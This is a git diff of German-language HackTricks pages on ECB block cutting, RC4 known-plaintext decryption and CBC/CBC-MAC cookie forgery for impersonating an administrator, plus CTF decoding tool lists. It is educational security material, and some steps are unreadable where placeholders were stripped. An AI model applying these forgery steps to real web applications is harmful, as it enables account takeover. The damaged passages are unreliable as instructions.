[**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} # ECB -(ECB) Electronic Code Book - symmetrisches Verschlüsselungsverfahren, bei dem jeder Block des Klartexts durch den Block des Geheimtexts ersetzt wird. Es ist das **einfachste** Verschlüsselungsverfahren. Die Hauptidee besteht darin, den Klartext in **Blöcke von N Bits** (abhängig von der Größe des Eingabedatenblocks, des Verschlüsselungsalgorithmus) aufzuteilen und dann jeden Block des Klartexts mit dem einzigen Schlüssel zu verschlüsseln (entschlüsseln). +(ECB) Electronic Code Book - symmetrisches Verschlüsselungsschema, das **jeden Block des Klartexts** durch den **Block des Geheimtexts** ersetzt. Es ist das **einfachste** Verschlüsselungsschema. Die Hauptidee besteht darin, den Klartext in **Blöcke von N Bits** (abhängig von der Größe des Eingabedatenblocks, des Verschlüsselungsalgorithmus) aufzuteilen und dann jeden Block des Klartexts mit dem einzigen Schlüssel zu verschlüsseln (entschlüsseln). ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) Die Verwendung von ECB hat mehrere Sicherheitsimplikationen: -* **Blöcke aus verschlüsselter Nachricht können entfernt werden** -* **Blöcke aus verschlüsselter Nachricht können verschoben werden** +* **Blöcke aus der verschlüsselten Nachricht können entfernt werden** +* **Blöcke aus der verschlüsselten Nachricht können verschoben werden** # Erkennung der Schwachstelle Stellen Sie sich vor, Sie melden sich mehrmals bei einer Anwendung an und erhalten **immer denselben Cookie**. Dies liegt daran, dass der Cookie der Anwendung **`|`** ist.\ Dann generieren Sie zwei neue Benutzer, beide mit dem **gleichen langen Passwort** und **fast** dem **gleichen** **Benutzernamen**.\ -Sie stellen fest, dass die **Blöcke von 8B**, in denen die **Informationen beider Benutzer** gleich sind, **gleich** sind. Sie vermuten, dass dies daran liegen könnte, dass **ECB verwendet wird**. +Sie stellen fest, dass die **Blöcke von 8B**, in denen die **Informationen beider Benutzer** gleich sind, **gleich** sind. Dann stellen Sie sich vor, dass dies daran liegen könnte, dass **ECB verwendet wird**. Wie im folgenden Beispiel. Beachten Sie, wie diese **2 decodierten Cookies** mehrmals den Block **`\x23U\xE45K\xCB\x21\xC8`** enthalten. ``` @@ -36,28 +37,28 @@ Wie im folgenden Beispiel. Beachten Sie, wie diese **2 decodierten Cookies** meh \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -Dies liegt daran, dass der **Benutzername und das Passwort dieser Cookies mehrmals den Buchstaben "a"** enthalten haben (zum Beispiel). Die **unterschiedlichen Blöcke** sind Blöcke, die **mindestens ein unterschiedliches Zeichen** enthalten (vielleicht das Trennzeichen "|" oder einen notwendigen Unterschied im Benutzernamen). +Das liegt daran, dass der **Benutzername und das Passwort dieser Cookies mehrmals den Buchstaben "a" enthielten** (zum Beispiel). Die **Blöcke**, die **unterschiedlich** sind, sind Blöcke, die **mindestens 1 unterschiedliches Zeichen** enthielten (vielleicht das Trennzeichen "|" oder einen notwendigen Unterschied im Benutzernamen). -Nun muss der Angreifer nur noch herausfinden, ob das Format `` oder `` ist. Dazu kann er einfach **mehrere Benutzernamen** mit **ähnlichen und langen Benutzernamen und Passwörtern generieren**, bis er das Format und die Länge des Trennzeichens findet: +Nun muss der Angreifer nur noch herausfinden, ob das Format `` oder `` ist. Um das zu tun, kann er einfach **mehrere Benutzernamen** mit **ähnlichen und langen Benutzernamen und Passwörtern generieren, bis er das Format und die Länge des Trennzeichens findet:** | Länge des Benutzernamens: | Länge des Passworts: | Länge von Benutzername+Passwort: | Länge des Cookies (nach dem Decodieren): | -| ------------------------ | -------------------- | --------------------------------- | --------------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +| ------------------------- | --------------------- | --------------------------------- | --------------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | # Ausnutzung der Schwachstelle ## Entfernen ganzer Blöcke -Nachdem das Format des Cookies bekannt ist (`|`), um den Benutzernamen `admin` zu imitieren, erstellen Sie einen neuen Benutzer namens `aaaaaaaaadmin`, erhalten Sie den Cookie und decodieren Sie ihn: +Nachdem das Format des Cookies bekannt ist (`|`), um den Benutzernamen `admin` zu übernehmen, erstellen Sie einen neuen Benutzer namens `aaaaaaaaadmin` und erhalten Sie den Cookie und decodieren Sie ihn: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -Wir können das zuvor erstellte Muster `\x23U\xE45K\xCB\x21\xC8` mit dem Benutzernamen sehen, der nur `a` enthielt.\ -Dann können Sie den ersten Block von 8B entfernen und Sie erhalten einen gültigen Cookie für den Benutzernamen `admin`: +Wir können das Muster `\x23U\xE45K\xCB\x21\xC8`, das zuvor mit dem Benutzernamen erstellt wurde, der nur `a` enthielt, sehen.\ +Dann können Sie den ersten Block von 8B entfernen und Sie erhalten ein gültiges Cookie für den Benutzernamen `admin`: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -65,30 +66,15 @@ Dann können Sie den ersten Block von 8B entfernen und Sie erhalten einen gülti In vielen Datenbanken ist es gleich, nach `WHERE username='admin';` oder nach `WHERE username='admin ';` zu suchen _(Beachten Sie die zusätzlichen Leerzeichen)_ -Eine weitere Möglichkeit, den Benutzer `admin` zu imitieren, besteht darin: +Eine weitere Möglichkeit, den Benutzer `admin` zu imitieren, wäre also: -* Generieren Sie einen Benutzernamen, der `len() + len() % len(block)` entspricht. Mit einer Blockgröße von `8B` können Sie einen Benutzernamen namens `username ` generieren, wobei das Trennzeichen `|` den Chunk `` erzeugt, der 2 Blöcke von 8Bs erzeugt. -* Generieren Sie dann ein Passwort, das eine genaue Anzahl von Blöcken enthält, die den Benutzernamen, den wir imitieren möchten, und Leerzeichen enthalten, z. B.: `admin ` +* Generieren Sie einen Benutzernamen, der folgendes erfüllt: `len() + len(` 2 Blöcke von 8Bs generieren wird. +* Generieren Sie dann ein Passwort, das eine genaue Anzahl von Blöcken ausfüllt, die den Benutzernamen und Leerzeichen enthalten, wie z.B.: `admin ` -Das Cookie dieses Benutzers besteht aus 3 Blöcken: den ersten 2 Blöcken des Benutzernamens + Trennzeichen und dem dritten Block des Passworts (das den Benutzernamen fälscht): `username |admin ` +Das Cookie dieses Benutzers wird aus 3 Blöcken bestehen: die ersten 2 Blöcke sind die Blöcke des Benutzernamens + Trennzeichen und der dritte Block ist das Passwort (das den Benutzernamen fälscht): `Benutzername |admin ` -**Ersetzen Sie dann einfach den ersten Block durch den letzten und Sie werden den Benutzer `admin` imitieren: `admin |username`** +**Dann ersetzen Sie einfach den ersten Block durch den letzten und werden den Benutzer `admin` imitieren: `admin |Benutzername`** ## Referenzen * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) - - -
- -Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/crypto-and-stego/rc4-encrypt-and-decrypt.md b/crypto-and-stego/rc4-encrypt-and-decrypt.md index 866dd26bb..e0a08bb0c 100644 --- a/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} -Wenn Sie auf irgendeine Weise einen Klartext mit RC4 verschlüsseln können, können Sie jeden Inhalt, der mit diesem RC4 verschlüsselt wurde (unter Verwendung des gleichen Passworts), nur mit der Verschlüsselungsfunktion entschlüsseln. +Wenn Sie auf irgendeine Weise einen Klartext mit RC4 verschlüsseln können, können Sie jeden Inhalt, der mit diesem RC4 verschlüsselt wurde (unter Verwendung des gleichen Passworts), einfach mit der Verschlüsselungsfunktion entschlüsseln. Wenn Sie einen bekannten Klartext verschlüsseln können, können Sie auch das Passwort extrahieren. Weitere Referenzen finden Sie in der HTB Kryptos-Maschine: @@ -25,16 +26,17 @@ Wenn Sie einen bekannten Klartext verschlüsseln können, können Sie auch das P +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index 2debb6321..a8d77ea54 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,44 +1,45 @@ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} # CBC -Wenn das **Cookie** nur der **Benutzername** ist (oder der erste Teil des Cookies der Benutzername ist) und Sie den Benutzernamen "**admin**" vortäuschen möchten. Dann können Sie den Benutzernamen **"bdmin"** erstellen und das **erste Byte** des Cookies per **Brute-Force** angreifen. +Wenn das **Cookie** nur der **Benutzername** ist (oder der erste Teil des Cookies der Benutzername ist) und Sie den Benutzernamen "**admin**" vortäuschen möchten. Dann können Sie den Benutzernamen **"bdmin"** erstellen und das **erste Byte** des Cookies **bruteforcen**. # CBC-MAC -**Cipher Block Chaining Message Authentication Code** (**CBC-MAC**) ist eine in der Kryptographie verwendete Methode. Sie funktioniert, indem eine Nachricht blockweise verschlüsselt wird, wobei die Verschlüsselung jedes Blocks mit dem vorherigen Block verknüpft ist. Dieser Prozess erzeugt eine **Kette von Blöcken**, die sicherstellt, dass selbst eine einzige Bit-Änderung der ursprünglichen Nachricht zu einer unvorhersehbaren Änderung im letzten Block der verschlüsselten Daten führt. Um eine solche Änderung vorzunehmen oder rückgängig zu machen, wird der Verschlüsselungsschlüssel benötigt, um die Sicherheit zu gewährleisten. +**Cipher Block Chaining Message Authentication Code** (**CBC-MAC**) ist eine in der Kryptographie verwendete Methode. Es funktioniert, indem eine Nachricht blockweise verschlüsselt wird, wobei die Verschlüsselung jedes Blocks mit der vorherigen verknüpft ist. Dieser Prozess erzeugt eine **Kette von Blöcken**, die sicherstellt, dass bereits eine einzige Bitänderung in der Originalnachricht zu einer unvorhersehbaren Änderung im letzten Block der verschlüsselten Daten führt. Um eine solche Änderung vorzunehmen oder rückgängig zu machen, wird der Verschlüsselungsschlüssel benötigt, um die Sicherheit zu gewährleisten. -Um den CBC-MAC der Nachricht m zu berechnen, verschlüsselt man m im CBC-Modus mit einem Initialisierungsvektor von Null und behält den letzten Block bei. Die folgende Abbildung skizziert die Berechnung des CBC-MAC einer Nachricht, die aus Blöcken besteht![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) unter Verwendung eines geheimen Schlüssels k und einer Blockverschlüsselung E: +Um den CBC-MAC der Nachricht m zu berechnen, verschlüsselt man m im CBC-Modus mit einem Initialisierungsvektor von Null und behält den letzten Block bei. Die folgende Abbildung skizziert die Berechnung des CBC-MAC einer Nachricht, die aus Blöcken besteht![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) unter Verwendung eines geheimen Schlüssels k und einer Blockchiffre E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # Schwachstelle Bei CBC-MAC wird normalerweise der **IV-Wert 0** verwendet.\ -Dies ist ein Problem, da 2 bekannte Nachrichten (`m1` und `m2`) unabhängig voneinander 2 Signaturen (`s1` und `s2`) erzeugen. Also: +Dies ist ein Problem, da 2 bekannte Nachrichten (`m1` und `m2`) unabhängig voneinander 2 Signaturen (`s1` und `s2`) erzeugen werden. Also: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -Dann erzeugt eine aus m1 und m2 konkatenierte Nachricht (m3) 2 Signaturen (s31 und s32): +Dann wird eine Nachricht, die aus m1 und m2 konkateniert ist (m3), 2 Signaturen (s31 und s32) erzeugen: * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**Die Berechnung ist möglich, ohne den Schlüssel der Verschlüsselung zu kennen.** +**Was möglich ist, ohne den Schlüssel der Verschlüsselung zu kennen.** Stellen Sie sich vor, Sie verschlüsseln den Namen **Administrator** in **8-Byte-Blöcken**: @@ -46,36 +47,37 @@ Stellen Sie sich vor, Sie verschlüsseln den Namen **Administrator** in **8-Byte * `rator\00\00\00` Sie können einen Benutzernamen namens **Administ** (m1) erstellen und die Signatur (s1) abrufen.\ -Dann können Sie einen Benutzernamen erstellen, der das Ergebnis von `rator\00\00\00 XOR s1` ist. Dadurch wird `E(m2 XOR s1 XOR 0)` erzeugt, was s32 ist.\ -Nun können Sie s32 als Signatur des vollständigen Namens **Administrator** verwenden. +Dann können Sie einen Benutzernamen erstellen, der das Ergebnis von `rator\00\00\00 XOR s1` ist. Dies wird `E(m2 XOR s1 XOR 0)` generieren, was s32 ist.\ +Nun können Sie s32 als die Signatur des vollständigen Namens **Administrator** verwenden. ### Zusammenfassung -1. Holen Sie sich die Signatur des Benutzernamens **Administ** (m1), die s1 ist. -2. Holen Sie sich die Signatur des Benutzernamens **rator\x00\x00\x00 XOR s1 XOR 0**, die s32 ist. +1. Holen Sie sich die Signatur des Benutzernamens **Administ** (m1), die s1 ist +2. Holen Sie sich die Signatur des Benutzernamens **rator\x00\x00\x00 XOR s1 XOR 0**, die s32 ist**.** 3. Setzen Sie das Cookie auf s32 und es wird ein gültiges Cookie für den Benutzer **Administrator** sein. -# Angriff auf die Kontrolle des IV +# Angriff zur Steuerung des IV -Wenn Sie den verwendeten IV-Wert kontrollieren können, könnte der Angriff sehr einfach sein.\ -Wenn das Cookie nur der verschlüsselte Benutzername ist, können Sie den Benutzer "**administrator**" vortäuschen, indem Sie den Benutzer "**Administrator**" erstellen und sein Cookie erhalten.\ -Nun, wenn Sie den IV-Wert kontrollieren können, können Sie das erste Byte des IV-Werts ändern, sodass **IV\[0] XOR "A" == IV'\[0] XOR "a"** und das Cookie für den Benutzer **Administrator** neu generieren. Dieses Cookie wird gültig sein, um den Benutzer **administrator** mit dem ursprünglichen **IV** zu vortäuschen. +Wenn Sie den verwendeten IV-Wert steuern können, könnte der Angriff sehr einfach sein.\ +Wenn das Cookie nur der verschlüsselte Benutzername ist, um den Benutzer "**Administrator**" zu vortäuschen, können Sie den Benutzer "**Administrator**" erstellen und sein Cookie erhalten.\ +Nun, wenn Sie den IV-Wert kontrollieren können, können Sie das erste Byte des IV-Werts ändern, sodass **IV\[0] XOR "A" == IV'\[0] XOR "a"** und das Cookie für den Benutzer **Administrator** neu generieren. Dieses Cookie wird gültig sein, um den Benutzer **administrator** mit dem ursprünglichen **IV** zu **vortäuschen**. ## Referenzen Weitere Informationen unter [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index e410bb35f..bcc46ad2f 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,22 +1,23 @@ # Crypto CTFs Tricks +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
+{% endhint %} ## Online-Hash-Datenbanken -* _**Suchen Sie bei Google**_ +* _**Google es**_ * [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) * [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) * [https://crackstation.net/](https://crackstation.net) @@ -45,7 +46,7 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: ### Substitution-Autosolver * [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -* [https://quipqiup.com/](https://quipqiup.com) - Sehr gut! +* [https://quipqiup.com/](https://quipqiup.com) - Sehr gut ! #### Caesar - ROTx Autosolver @@ -55,7 +56,7 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Base Encodings Autosolver +### Base-Codierungen-Autosolver Überprüfen Sie alle diese Basen mit: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) @@ -103,7 +104,9 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: * `👟👦👣👘👚👘👩👘👚👦👣👘` * **Base122** \[] * `4F ˂r0Xmvc` -* **ATOM-128** +* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] +* `MIc3KiXa+Ihz+lrXMIc3KbCC` +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] * `DmPsv8J7qrlKEoY7` * **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * `kLD8iwKsigSalLJ5` @@ -130,20 +133,14 @@ Die meisten codierten Daten können mit diesen 2 Ressourcen decodiert werden: ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Tot: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### Morse - -* 